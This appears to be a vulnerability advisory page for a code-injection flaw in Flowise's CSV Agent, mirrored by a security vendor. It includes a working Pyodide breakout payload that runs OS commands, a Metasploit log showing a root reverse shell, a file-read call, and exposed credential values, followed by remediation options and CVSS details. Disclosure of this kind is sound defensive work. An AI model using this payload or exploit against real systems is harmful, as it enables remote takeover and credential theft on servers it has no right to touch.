Flowise: CSV Agent Remote Code Execution via Pyodide Code Injection — Root Shell Verified
This is not theoretical — a Meterpreter reverse shell session as root has been established on Flowise 3.1.2.
1. Python code injection via base64_string = "${base64String}" (CSVAgent.ts line 161)
2. Pyodide js bridge provides access to the host Node.js process
3. process.mainModule.constructor._load('child_process') loads child_process (bypasses ESM require restriction)
4. .execSync('CMD') executes arbitrary OS commands as root (PID 1 in container)
```
";import js;e=js.globalThis.eval;e("process.mainModule.constructor._load('child_process').execSync('id')");#
```
Constraint: No commas allowed in payload — csvFile.split(',') splits on all commas.
```
msf > use exploit/multi/http/flowise_csv_agent_rce
msf > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
msf > exploit
[+] Authentication successful
[+] Created chatflow: b6716feb-63c8-4fd2-993f-cd43788704b4
[*] Sending stage (3090404 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:41422)
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : cbce3fb352b7
OS : Linux 6.8.0-111-generic
Architecture : x64
Meterpreter : x64/linux
meterpreter > shell
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
# uname -a
Linux cbce3fb352b7 6.8.0-111-generic x86_64 Linux
```
Credential Theft:
```
FLOWISE_PASSWORD=admin123
DATABASE_PATH=/root/.flowise
APIKEY_PATH=...
```
Arbitrary File Read via process.binding('fs').readFileUtf8('/etc/hostname') → cbce3fb352b7
Server DoS — certain native binding calls (spawn_sync) crash the Node.js process entirely.
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
File: packages/components/nodes/agents/CSVAgent/CSVAgent.ts
Lines 133-138 — Unsanitized string extraction from data URI via file.split(',').pop().pop() — no validation on content.
Lines 155-171 — Direct interpolation into executable Python code:
base64_string = "${base64String}" is inserted into a Python string literal via JS template literal. If the string contains a closing double-quote followed by Python code, it breaks out of the string context.
validatePythonCodeForDataFrame() denylist is only applied to LLM-generated code at line 198, NOT to this initial code block at line 171.
Option 1 (Best): Use pyodide.globals.set('base64_string', base64String) instead of string interpolation
Option 2: Validate base64 before interpolation — reject if not matching /^[A-Za-z0-9+/=]*$/
Option 3: Escape special characters (", \n, \r, \\) before interpolation
Disclosure: Identified with AI assistance (Claude Code). Analysis, verification, and Metasploit module by S9S Bounty-LAB / Kamal Sentassi.
This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. Rated impact: confidentiality high, integrity high, availability high.
The score comes from this vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVE-2026-69255 is classified as CWE-94: Code Injection. Input is incorporated into code that the runtime evaluates, so an attacker can have their own code executed.
CVE-2026-69255 is recorded against 3 packages.
Published on 4 August 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.
github.com (Web)
github.com (Web)
github.com (Web)
github.com (Package)
github.com (Web)
flowise has other advisories on record. If you are patching this one, these are worth checking on the same host:
These advisories are the same class of weakness (CWE-94: Code Injection) in other software:
Details
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| flowise | — | — |
| flowise-components | — | — |
| unknown | — | — |
References
Similar Threats
Exploit Protection
CVE-2026-69255 carries CVSS 9.5 Critical rating. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.
Check My Site For CVE-2026-69255 →No credit card required · Results in minutes
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.
Stay up to date with the latest from Boteraser.
We use cookies to improve your experience on our site. By using our site, you consent to cookies.
Manage your cookie preferences below:
Essential cookies enable basic functions and are necessary for the proper function of the website.
CloudFlare provides web performance and security solutions, enhancing site speed and protecting against threats.
Service URL: developers.cloudflare.com (opens in a new window)
These cookies are needed for adding comments on this website.
These cookies are used for managing login functionality on this website.
Statistics cookies collect information anonymously. This information helps us understand how visitors use our website.
Google Analytics is a powerful tool that tracks and analyzes website traffic for informed marketing decisions.
Service URL: policies.google.com (opens in a new window)
You can find more information in our Cookie Policy and Privacy Policy.